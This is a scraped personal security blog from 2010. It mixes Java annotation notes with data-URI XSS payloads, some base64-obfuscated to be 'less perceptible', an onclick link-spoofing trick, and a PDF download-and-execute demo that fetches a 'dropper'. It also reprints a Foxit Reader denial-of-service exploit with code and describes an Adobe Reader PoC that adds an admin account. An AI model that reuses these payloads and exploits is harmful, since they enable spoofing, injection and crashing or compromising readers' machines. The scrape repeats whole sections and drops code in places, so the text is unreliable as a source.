Let's make our annotation.
Just for test, we will create a simple class.
And now the brains!
Our main class goes like this.
Let's test this!
Output:
test
21171036
test
21171036
Boom!
Monday, November 1, 2010
Java Annotations pt 2
This is my second entry about this topic. This one is a simple example how to implement a singleton pattern without have to code it, just annotate the class.
Let's make our annotation.
Just for test, we will create a simple class.
And now the brains!
Our main class goes like this.
Let's test this!
Output:
Boom!
Let's make our annotation.
Just for test, we will create a simple class.
And now the brains!
Our main class goes like this.
Let's test this!
Output:
Boom!
Sunday, October 31, 2010
Java Annotations
One of the coolest things that java permits to do, is add annotations on classes and methods.
This feature can extremely useful, for example build your how unit of tests or something else.
The interface is here you define or annotation.
And in your class.
Output
This feature can extremely useful, for example build your how unit of tests or something else.
The interface is here you define or annotation.
And in your class.
Output
Annotation class Main
name: Something
Version: This is a annotation
Uri Scheme
In this post i will cover one of the coolest features that modern browser support nowadays which is URI schemes. There is a lot of schemes out there, browser custom schemes (about:something), protocol schemes (mailto:something@something.com?subject=Hello&body=Hello), and of course data schemes.
In this post i only will talk about data schemes.
Data schemes are organized like this:
In the type of data you can various types of data such as:
text/html
application/javascript (text/javascript was depreced)
image/png
etc.
This types are defined in internet media types.
It's time to make some magic.
Put this in your browser:
You should se a image now!
Ok this is the thing, simple fact that you can store data in only a web page.
Now, the question is how we can make this feature useful for us?! Javascript/Html injections!
So let's test something, put this on your browser:
Boom!
Now let's make this even more fun! Let's encode javascript to make this less
perceptible.
Javascript Encoded + base64
Works!
This things can be done all content-types available, so be creative.
Hope you have learn something!.
These sites could be useful for you for further research:
Base64 online encoder - /http://www.motobit.com/util/base64-decoder-encoder.asp
XSS - /http://ha.ckers.org/xss.html
Internet media types - /http://en.wikipedia.org/wiki/Internet_media_type
Data URI Scheme - /http://en.wikipedia.org/wiki/Data:_URI_scheme
URI Scheme - /http://en.wikipedia.org/wiki/URI_scheme
In this post i only will talk about data schemes.
Data schemes are organized like this:
data:{type of the data};{encode},{data}
In the type of data you can various types of data such as:
text/html
application/javascript (text/javascript was depreced)
image/png
etc.
This types are defined in internet media types.
It's time to make some magic.
Put this in your browser:
data:image/gif;base64,R0lGODlhLQAwAPAAAAAAAFVVVSH5BAAHAAAALAAAAAAtADAAAAJxTGB4yesKW3y0ziszxVbzb3hiR2JgOYLnmmotCpsvG9c2Pec1zbf9PdL9VMLixjhsIJeLJPD4dCqY0ijVip1ml1Vr13n1hntf47hYBqZ/Z3Wbtda9c/HdHHaH50V13Fb8R7ZHMkgUSFfocui2qNf4UgAAOw==
You should se a image now!
Ok this is the thing, simple fact that you can store data in only a web page.
Now, the question is how we can make this feature useful for us?! Javascript/Html injections!
So let's test something, put this on your browser:
data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%55%52%49%20%73%63%68%65%6D%65%73%21%22%29%3C%2F%73%63%72%69%70%74%3E
Boom!
Now let's make this even more fun! Let's encode javascript to make this less
perceptible.
Javascript Encoded + base64
data:text/html;base64,PHNjcmlwdD52YXIgXzB4NGMxOT1bIlx4NTVceDcyXHg2OVx4MjBceDUzXHg2M1x4NjhceDY1XHg2RFx4NjVceDczXHgyMFx4MkZceDIwXHg0NVx4NkVceDYzXHg2Rlx4NjRceDY1XHg2NCJdO2Z1bmN0aW9uIE1zZ0JveChfMHg4OTExeDIpe2FsZXJ0KF8weDg5MTF4Mik7fSA7TXNnQm94KF8weDRjMTlbMF0pOzwvc2NyaXB0Pg==
Works!
This things can be done all content-types available, so be creative.
Hope you have learn something!.
These sites could be useful for you for further research:
Base64 online encoder - /http://www.motobit.com/util/base64-decoder-encoder.asp
XSS - /http://ha.ckers.org/xss.html
Internet media types - /http://en.wikipedia.org/wiki/Internet_media_type
Data URI Scheme - /http://en.wikipedia.org/wiki/Data:_URI_scheme
URI Scheme - /http://en.wikipedia.org/wiki/URI_scheme
Link Spoof
This is just a little trick to redirect a link
This link in a normal way lead us to google.com, but this is not a normal link, it will redirect you to yahoo.com, this is the "this" magic.
Works on IE, Firefox, Chrome, Opera.
Hope you have learn something!
<a href="http://google.com" onclick="this.href='http://yahoo.com'">Spoof link should go to google</a>
This link in a normal way lead us to google.com, but this is not a normal link, it will redirect you to yahoo.com, this is the "this" magic.
Works on IE, Firefox, Chrome, Opera.
Hope you have learn something!
Monday, April 12, 2010
Pdf Download & Execute
The PoC consists in download a file located in rep http://iamjuza.googlecode.com/files/dropper.txt and execute it.
Pdf Download & Execute from iamjuza on Vimeo.
Pdf Download & Execute 2 from iamjuza on Vimeo.
How to Java Threads
This paper talks about how to do threads in java (the basics, Sharing objects between threads, Thread colaboration).
Download!
Download!
Wednesday, April 7, 2010
Tuesday, April 6, 2010
Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Ok, this is my new exploit, i found this one playing with javascript, just take a look!
http://www.exploit-db.com/exploits/12080
--------------------------------------------------------------
Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link: http://www.foxitsoftware.com/pdf/reader/
Version: All versions <= 3.2.1.0401 have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!
Code:
function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}
DoS("DoS");
-------------------------
PoC: http://www.exploit-db.com/sploits/12080.pdf
http://www.exploit-db.com/exploits/12080
--------------------------------------------------------------
Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link: http://www.foxitsoftware.com/pdf/reader/
Version: All versions <= 3.2.1.0401 have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!
Code:
function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}
DoS("DoS");
-------------------------
PoC: http://www.exploit-db.com/sploits/12080.pdf
Wednesday, March 31, 2010
Adobe Reader 7-8 File Execution No Javascript
This is a vuln found by Didier Stevens (hxxp://blog.didierstevens.com/2010/03/29/escape-from-pdf/), since his POC isn't yet finish, this is one of my own, the pdf adds a admin user account to the system (username: x ;password: x).
Tested in Adobe Reader 9.3
Download POC here!
Enjoy it!
Check it out!
There is more pocs in the forge stay tuned!
Tested in Adobe Reader 9.3
Download POC here!
Enjoy it!
Check it out!
Adobe Reader File Execution - Add User POC from iamjuza on Vimeo.
There is more pocs in the forge stay tuned!
Subscribe to:
Posts (Atom)